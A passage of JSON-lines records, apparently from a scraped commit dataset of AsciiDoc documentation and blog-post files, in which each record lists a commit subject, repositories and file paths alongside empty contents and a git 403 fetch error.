403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2bda52ceb2acb721b4682c8a8d8bc36c42e54478","subject":"Changed link to latest version of developer manual","message":"Changed link to latest version of developer manual\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a3381c88aed3be2671a2b20c7d00d80dcf3491e1","subject":"Update 2016-11-20-Eating-Vegan-at-a-Conference.adoc","message":"Update 2016-11-20-Eating-Vegan-at-a-Conference.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-11-20-Eating-Vegan-at-a-Conference.adoc","new_file":"_posts\/2016-11-20-Eating-Vegan-at-a-Conference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad3066ea0b3132938dc29e15da6649094b114b0e","subject":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e84401354ac0131896e7ed1c9e89601d1afcf72","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ffbaf415801c557b0aef4917edbb31a8ff6c629","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2be0125b918c28569f80ac19764ba3ff621fafe8","subject":"y2b create post Apple iPhone 5 Event 
Livestream!","message":"y2b create post Apple iPhone 5 Event Livestream!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-11-Apple-iPhone-5-Event-Livestream.adoc","new_file":"_posts\/2012-09-11-Apple-iPhone-5-Event-Livestream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc3ffddad7e0f9663c94b4e1640b598728a545bd","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13a91e936a78988773eea5d125078c5e4c299d90","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c28d88a1d95989017acd64a1ecf78e0bfd1334a4","subject":"add some documentation for attestation","message":"add some documentation for attestation\n","repos":"akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool","old_file":"doc\/Attestation.adoc","new_file":"doc\/Attestation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"dc1b295bdb97f66befdf325f20d45da2ee61a3f1","subject":"y2b create post Thank you.","message":"y2b create post Thank you.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-18-Thankyou.adoc","new_file":"_posts\/2018-02-18-Thankyou.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d133c008fd18edcf981024056756968fbc62171","subject":"add hasumi's blog \"git\u30b3\u30de\u30f3\u30c9\u8abf\u3079\u3066\u307f\u305f\"","message":"add hasumi's blog 
\"git\u30b3\u30de\u30f3\u30c9\u8abf\u3079\u3066\u307f\u305f\"","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-15-git-usecase-introduction.adoc","new_file":"_posts\/2017-10-15-git-usecase-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02e0509f1bdb2a7ec5e403f23fb5b04c0c910bd2","subject":"Update 2017-09-25-Number-5.adoc","message":"Update 2017-09-25-Number-5.adoc","repos":"koter84\/blog,koter84\/blog,koter84\/blog,koter84\/blog","old_file":"_posts\/2017-09-25-Number-5.adoc","new_file":"_posts\/2017-09-25-Number-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koter84\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6988d66d8e41b0628019301299f124f5b9e198e","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"274be9ea9e309d721ed68660c338cfa9cb1390d0","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3c75f5cde7cbabfa1785e79a491675a6f361cb8","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/04\/29\/deref.adoc","new_file":"content\/news\/2022\/04\/29\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8c9e8a8169645547d6f2428c3e94e6030bdc53a5","subject":"Move section on non-forking","message":"Move section on non-forking\n","repos":"thoni56\/cgreen,thoni56\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen","old_file":"doc\/cgreen-guide-en.asciidoc","new_file":"doc\/cgreen-guide-en.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thoni56\/cgreen.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"e66e32f331a5ed328a888e480b908b2890902c9c","subject":"Squashed commit of the following:","message":"Squashed commit of the 
following:\n\ncommit 0bd1766cf1234621bdaa4805d5dc42949433e151\nAuthor: Lillian Mahoney <lillian.lynn.mahoney@gmail.com>\nDate: Wed Jan 7 16:29:12 2015 -0600\n\n testing\n","repos":"brechin\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,brechin\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia","old_file":"latest-changes.asciidoc","new_file":"latest-changes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Applemann\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b33d38cba90016055902466ae6c87273ebf628df","subject":"added references","message":"added references\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e28d9a379c6a3db306962d81ac69943ac760e473","subject":"Add files","message":"Add files","repos":"jmunoz298\/Atlasti7,jmunoz298\/atlasti,jmunoz298\/atlasti,jmunoz298\/atlasti,jmunoz298\/Atlasti7,jmunoz298\/Atlasti7","old_file":"01-1-Caqdas.adoc","new_file":"01-1-Caqdas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmunoz298\/atlasti.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"63be2a536762e11ce64b4b2d6249b42d30ff36fd","subject":"Add versioning document","message":"Add versioning document\n","repos":"mpreisler\/openscap,mpreisler\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,mpreisler\/openscap,jan-cerny\/openscap,redhatrises\/openscap,redhatrises\/openscap,ybznek\/openscap,jan-cerny\/openscap,openprivacy\/openscap,mpreisler\/openscap,Hexadorsimal\/openscap,ybznek\/openscap,openprivacy\/openscap,mpreisler\/openscap,redhatrises\/openscap,OpenSCAP\/openscap,openprivacy\/openscap,Hexadorsimal\/openscap,redhatrises\/openscap,OpenSCAP\/openscap,openprivacy\/openscap,jan-cerny\/openscap,Hexadorsimal\/openscap,mpreisler\/openscap,ybznek\/openscap,Hexadorsimal\/openscap,ybznek\/openscap,jan-cerny\/openscap,jan-cerny\/openscap,Hexadorsimal\/openscap,OpenSCAP\/openscap,redhatrises\/openscap,Hexadorsimal\/openscap,jan-cerny\/openscap,ybznek\/openscap,openprivacy\/openscap,openprivacy\/openscap,OpenSCAP\/openscap,ybznek\/openscap,redhatrises\/openscap","old_file":"docs\/contribute\/versioning.adoc","new_file":"docs\/contribute\/versioning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jan-cerny\/openscap.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"f01ebbc23effa2452d17ed0df658af2e8eadd4ef","subject":"Update 2016-10-22-Using-TLS-12-with-Python-on-OS-X.adoc","message":"Update 2016-10-22-Using-TLS-12-with-Python-on-OS-X.adoc","repos":"olivierbellone\/olivierbellone.github.io,olivierbellone\/olivierbellone.github.io,olivierbellone\/olivierbellone.github.io,olivierbellone\/olivierbellone.github.io","old_file":"_posts\/2016-10-22-Using-TLS-12-with-Python-on-OS-X.adoc","new_file":"_posts\/2016-10-22-Using-TLS-12-with-Python-on-OS-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/olivierbellone\/olivierbellone.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b34436885ceaf8fe305113a745f3cfc65f0ca408","subject":"y2b create post It Creates A Strange Sensation...","message":"y2b create post It Creates A Strange Sensation...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-11-It-Creates-A-Strange-Sensation.adoc","new_file":"_posts\/2017-05-11-It-Creates-A-Strange-Sensation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e083d33afa938f3671fe4df27f71291aa0c54488","subject":"Update 2017-03-15-Test-with-admonition-icons-2.adoc","message":"Update 2017-03-15-Test-with-admonition-icons-2.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2017-03-15-Test-with-admonition-icons-2.adoc","new_file":"_posts\/2017-03-15-Test-with-admonition-icons-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1066a6f8776e9bf66b7731b7e242d6ade75e3686","subject":"[DOCS] Add loopback to X-Pack install info (elastic\/x-pack-elasticsearch#2237)","message":"[DOCS] Add loopback to X-Pack install info (elastic\/x-pack-elasticsearch#2237)\n\nOriginal commit: elastic\/x-pack-elasticsearch@8c105818e2c53e76f02046ccd72ce13aeff904c7\n","repos":"gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch","old_file":"docs\/en\/installing-xes.asciidoc","new_file":"docs\/en\/installing-xes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca6ef633d4164bd094717ee17844df377c1e2405","subject":"Add streaming client capabilities design.","message":"Add streaming client capabilities 
design.","repos":"reactivity-io\/reactivity-doc","old_file":"streaming-client.adoc","new_file":"streaming-client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reactivity-io\/reactivity-doc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed4c0ff9d076e310c321a0700d123b4b9f9a7b9b","subject":"README","message":"README\n\n Added README\n","repos":"sys4\/chkquota","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sys4\/chkquota.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"944631235df733d491395dcb35621fee2567ece9","subject":"doc: initial checkin","message":"doc: initial checkin","repos":"jhinrichsen\/bazel-wsdl-java-weather-sample,jhinrichsen\/bazel-wsdl-java-weather-sample","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhinrichsen\/bazel-wsdl-java-weather-sample.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49bfefbe4f37a96c79c470043acd9b7e5b8a3538","subject":"Updated documentation","message":"Updated documentation\n","repos":"resilience4j\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,RobWin\/javaslang-circuitbreaker,goldobin\/resilience4j,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea2cd4a782bb7d4afe6cdf1c0e49f93f042f1994","subject":"Updated documentation","message":"Updated documentation\n","repos":"drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,drmaas\/resilience4j,storozhukBM\/javaslang-circuitbreaker,mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bd9f46a4040b3dba0e89bfb855ce57399f48b55d","subject":"Finishing touches","message":"Finishing touches\n","repos":"GYMY-16\/udi-01-TomasZilinek","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GYMY-16\/udi-01-TomasZilinek.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0e5d6795f713bf036da39ba677cc719798eee5e","subject":"Updated README screencast to use larger image","message":"Updated README screencast to use larger image\n\nLeverages a larger image so the terminal is easier to read at first\nglance.\n","repos":"bkuhlmann\/git-cop,bkuhlmann\/git-cop","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/git-cop.git\/': 
The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d64bb869413ccc089acfc0a1ddb5886d122741eb","subject":"Added Readme (converted from docbook manual)","message":"Added Readme (converted from docbook manual)\n","repos":"jwausle\/cmvn,ToToTec\/cmvn","old_file":"Readme.adoc","new_file":"Readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ToToTec\/cmvn.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d98f0153b4163922ae2f5aeb042575951258119e","subject":"added new documentation file for the groupcommunication","message":"added new documentation file for the groupcommunication\n","repos":"ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1","old_file":"documentation\/groupcom.adoc","new_file":"documentation\/groupcom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ohaz\/amos-ss15-proj1.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b22f9d7e86a05c559bffcfd6b897da5bc2aba4ce","subject":"[kudu-jepsen] fixed typo in README.adoc","message":"[kudu-jepsen] fixed typo in README.adoc\n\nFor the kudu-jepsen module, '.\/gradlew' should be run from the\nupper-level (parent) directory (i.e. $KUDU_ROOT\/java).\n\nAlso, updated the wording and path specification for the example\ninvolving the 'sshKeyPath' run-time property.\n\nChange-Id: I01a62d135aad560fa26f7a3ccf746813d3ec279e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11932\nTested-by: Kudu Jenkins\nReviewed-by: Hao Hao <99da4db57fde39d3df9f1908299d10b8082bf864@cloudera.com>\n","repos":"helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu","old_file":"java\/kudu-jepsen\/README.adoc","new_file":"java\/kudu-jepsen\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"135231f810598bb5f7a5d00d0687e90e91584294","subject":"deployment to Heroku documented","message":"deployment to Heroku documented\n","repos":"oboehm\/gdv.xport,oboehm\/gdv.xport,oboehm\/gdv.xport","old_file":"doc\/deployment.adoc","new_file":"doc\/deployment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oboehm\/gdv.xport.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"202fdd64c869eb7e1d6084a10fe93f164aa4cedb","subject":"add a section to the manual discussing the command= variable","message":"add a section to the manual discussing the command= variable\n\nThis includes a mention of using cmd \/c on Windows.\nThis would have helped on issue #1070 for 
example.\n","repos":"martine\/ninja,martine\/ninja,fuchsia-mirror\/third_party-ninja,mgaunard\/ninja,ninja-build\/ninja,mgaunard\/ninja,maruel\/ninja,sgraham\/ninja,ninja-build\/ninja,Maratyszcza\/ninja-pypi,nicolasdespres\/ninja,nafest\/ninja,ndsol\/subninja,nicolasdespres\/ninja,iwadon\/ninja,nico\/ninja,Qix-\/ninja,mydongistiny\/ninja,sxlin\/dist_ninja,bradking\/ninja,juntalis\/ninja,juntalis\/ninja,sgraham\/ninja,mydongistiny\/ninja,ndsol\/subninja,sxlin\/dist_ninja,lizh06\/ninja,nicolasdespres\/ninja,lizh06\/ninja,AoD314\/ninja,atetubou\/ninja,fuchsia-mirror\/third_party-ninja,Qix-\/ninja,martine\/ninja,mohamed\/ninja,vvvrrooomm\/ninja,maruel\/ninja,vvvrrooomm\/ninja,bradking\/ninja,sgraham\/ninja,iwadon\/ninja,Qix-\/ninja,nafest\/ninja,juntalis\/ninja,vvvrrooomm\/ninja,atetubou\/ninja,nico\/ninja,sgraham\/ninja,AoD314\/ninja,ninja-build\/ninja,sxlin\/dist_ninja,nafest\/ninja,nico\/ninja,Maratyszcza\/ninja-pypi,fuchsia-mirror\/third_party-ninja,AoD314\/ninja,martine\/ninja,iwadon\/ninja,sxlin\/dist_ninja,Maratyszcza\/ninja-pypi,maruel\/ninja,mgaunard\/ninja,iwadon\/ninja,nafest\/ninja,moroten\/ninja,mohamed\/ninja,bradking\/ninja,ninja-build\/ninja,juntalis\/ninja,bradking\/ninja,Qix-\/ninja,ndsol\/subninja,sxlin\/dist_ninja,mohamed\/ninja,vvvrrooomm\/ninja,sxlin\/dist_ninja,mohamed\/ninja,AoD314\/ninja,moroten\/ninja,moroten\/ninja,nico\/ninja,Maratyszcza\/ninja-pypi,atetubou\/ninja,ndsol\/subninja,atetubou\/ninja,mydongistiny\/ninja,mgaunard\/ninja,maruel\/ninja,mydongistiny\/ninja,lizh06\/ninja,lizh06\/ninja,nicolasdespres\/ninja,moroten\/ninja,fuchsia-mirror\/third_party-ninja,sxlin\/dist_ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"21cc7cac478282075a81418c035b1da1bd3a674a","subject":"converted portal.md to asciidoc format as an experiment","message":"converted portal.md to asciidoc format as an experiment\n\nChange-Id: I5768c8d277273e4a8074602406197daa99c93408\n","repos":"cambridgehackers\/connectal,chenm001\/connectal,csail-csg\/connectal,hanw\/connectal,cambridgehackers\/connectal,cambridgehackers\/connectal,hanw\/connectal,hanw\/connectal,8l\/connectal,csail-csg\/connectal,chenm001\/connectal,chenm001\/connectal,hanw\/connectal,chenm001\/connectal,8l\/connectal,8l\/connectal,csail-csg\/connectal,8l\/connectal,chenm001\/connectal,hanw\/connectal,csail-csg\/connectal,cambridgehackers\/connectal,csail-csg\/connectal,cambridgehackers\/connectal,8l\/connectal","old_file":"doc\/portal.asciidoc","new_file":"doc\/portal.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/csail-csg\/connectal.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d1ef854f302d1260f72e56bd27372846fb76a02","subject":"New Event - ClojureBridge London Sept 2022","message":"New Event - ClojureBridge London Sept 2022\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/clojurebridge-london-sept-2022.adoc","new_file":"content\/events\/2022\/clojurebridge-london-sept-2022.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} 
{"commit":"5ceb7ae37cdfff1a815aa437d618c0ecfe9f6d6b","subject":"Update 2016-01-012-HubPress-CNAME-and-A-Records.adoc","message":"Update 2016-01-012-HubPress-CNAME-and-A-Records.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2016-01-012-HubPress-CNAME-and-A-Records.adoc","new_file":"_posts\/2016-01-012-HubPress-CNAME-and-A-Records.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"555f1536decb986808b229562fbd56bd57c6b7b4","subject":"Update docs with command to create hstore on test db","message":"Update docs with command to create hstore on test db","repos":"pombredanne\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 